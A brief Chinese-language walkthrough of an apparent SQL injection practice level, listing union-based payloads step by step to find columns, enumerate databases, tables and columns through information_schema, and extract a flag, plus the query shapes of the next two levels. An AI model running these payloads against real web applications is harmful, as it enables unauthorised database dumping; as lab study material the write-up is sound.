和第一关一样,唯一就是注意有闭合和注释符
id=1' and 1=1--+
id=1' order by 3--+ 爆列
id=1' and 1=2 union select 1,2,3--+ 2,3位置回显
id=1' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--+ 暴库
id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='error'--+ 爆表
id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='error_flag'--+ 爆字段
id=1' and 1=2 union select 1,group_concat(concat_ws(0x7e,flag,0x7e)),3 from error.error_flag--+ 爆出flag列所有数据
附上3,4关语句
Pass-03:select *from user where id=('1')
Pass-04:select *from user where id=("1")
绕过方式和第一,二关基本一致